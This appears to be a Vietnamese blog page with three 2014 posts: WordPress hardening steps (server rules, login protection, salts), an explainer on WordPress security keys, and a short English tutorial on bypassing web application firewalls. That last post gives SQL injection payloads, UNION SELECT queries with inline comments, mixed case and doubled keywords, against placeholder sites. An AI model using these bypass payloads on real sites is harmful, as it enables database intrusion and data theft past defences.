Free share all

san · 20 Aug 2014

<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj-NNrNWbguNzv8uiQZ1KzliLoNMiJmNYEk6Cc0Oy61mwIcIOYxUPAg3-1-TZki4CMTTydMa1cHecep7ZkP3ld_GN3skSFo1SprzggSlBXb-na3ABfv91YBiKjwAsG3NwguNmRys8dUEbR/s1600/worpdress-security.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="" border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj-NNrNWbguNzv8uiQZ1KzliLoNMiJmNYEk6Cc0Oy61mwIcIOYxUPAg3-1-TZki4CMTTydMa1cHecep7ZkP3ld_GN3skSFo1SprzggSlBXb-na3ABfv91YBiKjwAsG3NwguNmRys8dUEbR/s1600/worpdress-security.jpg" title="wordpress securit" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"> </td></tr>
</tbody></table>
 
 
1. Không sử dụng tên đăng nhập wp-admin là admin 
Phần lớn các webmaster đều sử dụng tên người dùng "admin" do thực
 tế WordPress đặt mặc định username này. Nếu bạn vẫn đang sử dụng tên 
người dùng này, hãy tạo một tài khoản mới, chuyển tất cả các bài viết 
sang tài khoản đó, và thay đổi 'admin' thành tên khác (hoặc xóa nó hoàn toàn). 
Bạn có thể dùng plugin: <a class="externalLink" href="http://wordpress.org/plugins/admin-renamer-extended/" rel="nofollow" target="_blank">WordPress &#8250; Admin renamer extended &laquo; WordPress Plugins</a> để thay đổi tên admin 
 
2. Mật khẩu 
Sử dụng một mật khẩu đủ mạnh. Một mật khẩu mạnh bao gồm chữ cái viết thường, viết hoa ; chữ số và ký tự đặc biệt. 
Bạn có thể sử dụng plugin: <a class="externalLink" href="http://wordpress.org/extend/plugins/enforce-strong-password/" rel="nofollow" target="_blank">WordPress &#8250; Enforce Strong Password &laquo; WordPress Plugins</a> để tạo mật khẩu mạnh cho mình 
 
3. Plugins 
Có thể sử dụng các plugin sau để tăng cường bảo mật 
 
 
<ul>
<li><a class="externalLink" href="http://wordpress.org/extend/plugins/bruteprotect/" rel="nofollow" target="_blank">BruteProtect</a></li>
<li><a class="externalLink" href="http://wordpress.org/extend/plugins/limit-login-attempts/" rel="nofollow" target="_blank">Limit Login Attempts</a></li>
<li><a class="externalLink" href="http://wordpress.org/extend/plugins/lockdown-wp-admin/" rel="nofollow" target="_blank">Lockdown WP Admin</a></li>
<li><a class="externalLink" href="http://wordpress.org/extend/plugins/wp-fail2ban/" rel="nofollow" target="_blank">WP Fail2Ban</a></li>
<li><a class="externalLink" href="http://wordpress.org/extend/plugins/admin-renamer-extended/" rel="nofollow" target="_blank">Admin Renamed Extended</a></li>
<li><a class="externalLink" href="http://wordpress.org/extend/plugins/enforce-strong-password/" rel="nofollow" target="_blank">Enforce Strong Password</a></li>
<li><a class="externalLink" href="http://wordpress.org/extend/plugins/wordfence/" rel="nofollow" target="_blank">Wordfence Security</a></li>
<li><a class="externalLink" href="http://wordpress.org/extend/plugins/threewp-activity-monitor/" rel="nofollow" target="_blank">3WP Activity Monitor</a></li>
<li><a class="externalLink" href="http://wordpress.org/plugins/all-in-one-wp-security-and-firewall/" rel="nofollow" target="_blank">All in one WP Security</a></li>
<li><a class="externalLink" href="http://wordpress.org/plugins/rename-wp-login/" rel="nofollow" target="_blank">Rename wp-login.php</a></li>
</ul>
4. Protect Your Server 
Nếu bạn khóa truy cập wp-login.php hoặc wp-admin bạn có thể nhận được 
thông báo lỗi 404 hoặc 401 khi truy cập vào những trang đó. Để tránh 
điều này bạn có thể thêm dòng sau vào htaccess 
 
 
<blockquote class="tr_bq">
ErrorDocument 401 default</blockquote>
 
 
Đối với nginx thì thêm rule sau vào file vhost 
 
<blockquote class="tr_bq">
error_page  401  http://example.com/forbidden.html;</blockquote>
 
sau đó tạo 1 trang thông báo lỗi cho riêng bạn. 
 
5. Password Protect wp-login.php 
 
Tạo thêm lớp đăng nhập thứ 2 cho wp-admin. Để tạo lớp đăng nhập thứ 2 bạn cần tạo file htpasswd, sau đó 
 
* Với apache thêm rule sau vào htaccess 
 
<blockquote class="tr_bq">
# Stop Apache from serving .ht* files 
<Files ~ "^\.ht"> Order allow,deny Deny from all </Files> 
 
# Protect wp-login 
<Files wp-admin> 
AuthUserFile ~/.htpasswd 
AuthName “Private access” 
AuthType Basic 
require user mysecretuser 
</Files>  </blockquote>
 
* Với nginx thêm rule sau vào file vhost 
 
<blockquote class="tr_bq">
location /wp-admin { 
    auth_basic "Administrator Login"; 
    auth_basic_user_file .htpasswd; 
} </blockquote>
 
 
6. Giới hạn IP truy cập vào wp-admin 
 
* Apache 
Thêm rule sau vào htaccess 
 
<blockquote class="tr_bq">
# Block access to wp-admin. 
order deny,allow 
allow from x.x.x.x 
deny from all</blockquote>
 
* Nginx 
Thêm rule sau vào file vhost 
 
<blockquote class="tr_bq">
error_page  403  http://example.com/forbidden.html; 
location /wp-admin { 
  deny    192.168.1.1; 
  allow  192.168.1.0/24; 
  allow  10.1.1.0/16; 
  deny    all; 
}</blockquote>
 
Thay đổi IP cho phù hợp 
Chú ý: Nếu theme của bạn sử dụng ajax bạn có thể phải thêm rule sau: 
 
* Apache 
 
<blockquote class="tr_bq">
# Allow acces to wp-admin/admin-ajax.php 
<Files admin-ajax.php> 
    Order allow,deny 
    Allow from all 
    Satisfy any 
</Files></blockquote>
* Nginx   
<blockquote class="tr_bq">
location /wp-admin/admin-ajax.php { 
    allow all; 
}</blockquote>
7. Deny Access to No Referrer Requests 
Chống spam 
 
* Apache   
<blockquote class="tr_bq">
# Stop spam attack logins and comments 
 
<IfModule mod_rewrite.c> 
    RewriteEngine On 
    RewriteCond %{REQUEST_METHOD} POST 
    RewriteCond %{REQUEST_URI} .(wp-comments-post|wp-login)\.php* 
    RewriteCond %{HTTP_REFERER} !.*example.com.* [OR] 
    RewriteCond %{HTTP_USER_AGENT} ^$ 
    RewriteRule (.*) http://%{REMOTE_ADDR}/$ [R=301,L] 
</ifModule></blockquote>
 
*Nginx 
 
<blockquote class="tr_bq">
location ~* (wp-comments-posts|wp-login)\.php$ {         if ($http_referer !~ ^(http://example.com) ) {           return 405;         }       }</blockquote>
 
8. ModSecurity 
Sử dụng modsecurity nếu bạn dùng VPS or server 
 
9. Fail2Ban 
Fail2ban là một daemon Python chạy ở chế 
độ nền. Nó sẽ kiểm tra log file được tạo ra bij Apache (hoặc SSH ví dụ),
 và các sự kiện nhất định có thể thêm một quy tắc tường lửa. Nó sử dụng 
một bộ lọc để gọi với một biểu thức chính quy. Nếu đó là biểu hiện 
thường xuyên xảy ra ví dụ như 5 lần trong 5 phút, nó có thể chặn mà địa 
chỉ IP trong 60 phút (hoặc bất kỳ thiết lập khác của các số). Lắp đặt và
 vận Fail2ban yêu cầu truy cập root. 
 
10. Cloud/Proxy Services 
Các dịch vụ như CloudFlare và Sucuri CloudProxy cũng có thể giúp giảm 
thiểu các cuộc tấn công bằng cách chặn các IP trước khi chúng đến máy 
chủ của bạn. 
 
 
11. Không dùng prefix mặc định 
Rất nhiều webmaster trong quá trình cài đặt thường để prefix mặc định 
là wp, điều này là không nên chính vì vậy trong quá trình cài đặt các 
bạn nên chọn một prefix khác. 
 
12. Authentication Unique Keys and Salts 
Nhiều người thường bỏ qua dòng này trong file config.php điều này cũng 
có thể bị attacker lợi dụng vì thế khuyến cáo các bạn không nên bỏ qua 
dòng này. 
Mở file config.php và tìm dòng 
 
<blockquote class="tr_bq">
define('AUTH_KEY',        'put your unique phrase here'); define('SECURE_AUTH_KEY',  'put your unique phrase here'); define('LOGGED_IN_KEY',    'put your unique phrase here'); define('NONCE_KEY',        'put your unique phrase here'); define('AUTH_SALT',        'put your unique phrase here'); define('SECURE_AUTH_SALT', 'put your unique phrase here'); define('LOGGED_IN_SALT',  'put your unique phrase here'); define('NONCE_SALT',      'put your unique phrase here');</blockquote>
 
Sau đó các bạn truy cập vào địa chỉ: <a class="externalLink" href="https://api.wordpress.org/secret-key/1.1/salt/" rel="nofollow" target="_blank">https://api.wordpress.org/secret-key/1.1/salt/</a> copy toàn bộ nội dung lấy được thay thế các dòng trên. 
 
<div style="text-align: left;">
</div>

Một số biện pháp bảo mật cho wordpress

1. Không sử dụng tên đăng nhập wp-admin là admin Phần lớn các webmaster đều sử dụng tên người dùng "admin" do thực tế WordPress đặt mặc định username này. Nếu bạn vẫn đang sử dụng tên người dùng n…

Đọc thêm »

san · 20 Aug 2014

Nếu bạn đang sử dụng WordPress và có đọc một chút về bảo mật WordPress, 
bạn sẽ thấy chúng đề cập tới vấn đề WordPress Security Key (hay gọi là 
Keys Secret). Trong bài viết này, chúng tôi sẽ giải thích về vấn 
đề WordPress Security Keys là gì, tại sao, và làm như thế nào  cho những
 người mới sử dụng WordPress. 
 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKRKEDxYILZb1aq2pJ4oDMSIrNo7j7iMhI1LoNiXw4jnWzlFgs8VIYG-73cQQHAedDG_ED5AMBg8YTg06IDNPUffLy13QMqqpAK9Qblz9CZNOSErkrx1Pb-gV_zmNVnZH9pGsDSo0sLoEx/s1600/WordPress+Security+Keys.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKRKEDxYILZb1aq2pJ4oDMSIrNo7j7iMhI1LoNiXw4jnWzlFgs8VIYG-73cQQHAedDG_ED5AMBg8YTg06IDNPUffLy13QMqqpAK9Qblz9CZNOSErkrx1Pb-gV_zmNVnZH9pGsDSo0sLoEx/s1600/WordPress+Security+Keys.png" /></a></div>
 
 
1. WordPress Security Keys là gì ? 
WordPress Security Keys là một tập hợp các biến ngẫu nhiên để cải 
thiện mã hóa thông tin lưu trữ trong cookie của người dùng. Có tổng 4 
Keys bảo mật: AUTH_KEY, SECURE_AUTH_KEY, LOGGED_IN_KEY, and NONCE_KEY 
 
2. Tại sao cần sử dụng WordPress Security Keys? 
Security keys làm cho website của chúng ta an toàn và khó có thể bị 
crack mật khẩu. Một mật khẩu không được mã hóa như “username” hoặc 
“wordpress” có thể dễ dàng bị bẻ khóa, nhưng với ngẫu nhiên thì nó không
 thể đoán trước, mật khẩu mã hóa là một chuỗi dạng “88a7da62429ba6ad3cb3c76a09641fc”
  thì phải mất nhiều năm mới có thể giải mã được nó. Bạn nên sử dụng 
WordPress Security keys để tăng thêm sức mạnh bảo mật cho blog WordPress
 hoặc website của bạn . 
<h3>
3. Sử dụng WordPress Security Keys cho website như thế nào?</h3>
Bản thân host  Wordpress blogs không có Security Keys mặc định. Bạn 
sẽ cần add thêm cho website của mình. Nó rất đơn giản và dễ dàng xử lý, 
bạn có thể làm được điều này miễn là bạn biết sử dụng FTP. 
Đầu tiên, bạn sẽ cần nhận Secret Key của riêng mình bằng cách click 
vào đây. WordPress sẽ tạo ra  mã bảo mật ngẫu nhiên cho bạn. Và bạn cần 
copy cái mà bạn thấy ở đây. 
Bước 2 là sửa đổi file wp-config.php của 
blog của bạn.  Bạn sẽ tìm thấy file này trong folder root của wordpress.
 Trong file wp-config tại dòng số 45, bạn sẽ nhìn thấy vào dòng như dưới
 đây: 
 
 
<blockquote class="tr_bq">
define('AUTH_KEY',         'put your unique phrase here'); 
define('SECURE_AUTH_KEY',  'put your unique phrase here'); 
define('LOGGED_IN_KEY',    'put your unique phrase here'); 
define('NONCE_KEY',        'put your unique phrase here'); 
define('AUTH_SALT',        'put your unique phrase here'); 
define('SECURE_AUTH_SALT', 'put your unique phrase here'); 
define('LOGGED_IN_SALT',   'put your unique phrase here'); 
define('NONCE_SALT',       'put your unique phrase here');</blockquote>
 
 
Đến đây, rất đơn giản, bạn chỉ cần pates cái  secret keys mà bạn có ở bước 1, đè vào đoạn mặc định của wordpress này là ok.

Sau đó, bạn save wp-config.php lại và bạn đã xong việc. Nếu bạn đã 
đăng nhập vào trang quản trị rồi, nó sẽ yêu cầu bạn đăng nhập lại một 
lần nữa. 
 
Câu hỏi thường gặp (FAQs) 
Tôi có cần phải nhớ Security Keys này không? 
No, bạn không cần phải nhớ nó. Bạn có thể quay trở lại bước 1 và lấy đoạn mã khác pates lại vào file wp-config.php.

WordPress Security Keys

Nếu bạn đang sử dụng WordPress và có đọc một chút về bảo mật WordPress, bạn sẽ thấy chúng đề cập tới vấn đề WordPress Security Key (hay gọi là Keys Secret). Trong bài viết này, chúng tôi sẽ giải thí…

Đọc thêm »

san · 19 Aug 2014

<div id="post_body">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTw6VZFmkp4-YsPkDxW7EHefXz-sikzqEQ9r_JtKDn8T7IPD3VmhoNhyphenhyphenW9nuRUTY4y5KDE9vYcXNvON2JJTDtH5UPNCjfOqoBj05LAxd9_FK2kCjlQ1UlpYPTvXTGjgUecWTI6AT1MuGsh/s1600/web+application+firewall.jpg" style="box-sizing: border-box; clear: left; color: #999999; float: left; margin-bottom: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTw6VZFmkp4-YsPkDxW7EHefXz-sikzqEQ9r_JtKDn8T7IPD3VmhoNhyphenhyphenW9nuRUTY4y5KDE9vYcXNvON2JJTDtH5UPNCjfOqoBj05LAxd9_FK2kCjlQ1UlpYPTvXTGjgUecWTI6AT1MuGsh/s640/web+application+firewall.jpg" style="border-width: 0px; box-sizing: border-box; height: auto; max-width: 100%;" width="640" /></a> 
<a href="https://www.blogger.com/null" name="more"></a>Web
 application firewalls are designed to protect web applications from 
known attacks, such as SQL injection attacks, that are commonly used to 
compromise websites. They do this by intercepting requests sent by 
clients and enforcing strict rules about their formatting and payload. 
Today we demonstrate some tricks to bypass WAF Sqli http://xyz.com/detail.php?id=44 union all select 1,2,3,4,5— -  By passed Sqli http://xyz.com/detailphp?id=44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5— -  By Function Capitalization:- Some Web Application Firewalls will filter only lowercase alphabets, So we can easily bypass  by case changing. Actual query http://xyz.com/detail.php?id=44 UNION SELECT 1,2,3,4,5— Query to bypass the WAF http://xyz.com/detail.php?id=-1 uniOn SeLeCt 1,2,3,4,5— By Replaced Keywords:- Some
 WAF's will escape certain keywords such as UNION, SELECT, ORDER BY, 
etc. This can be used to our advantage by duplicating the detected word 
within another. Actual query http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5— 
 Query to bypass the WAF http://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5-- - - 
 
By HOC
</div>

Bypass Web Application Firewalls By Simple Trick

Web application firewalls are designed to protect web applications from known attacks, such as SQL injection attacks, that are commonly used to compromise websites. They do this by intercepting re…

Đọc thêm »

Free share all

Một số biện pháp bảo mật cho wordpress

WordPress Security Keys

Bypass Web Application Firewalls By Simple Trick

Bài đăng phổ biến

Bình luận

Lưu trữ Blog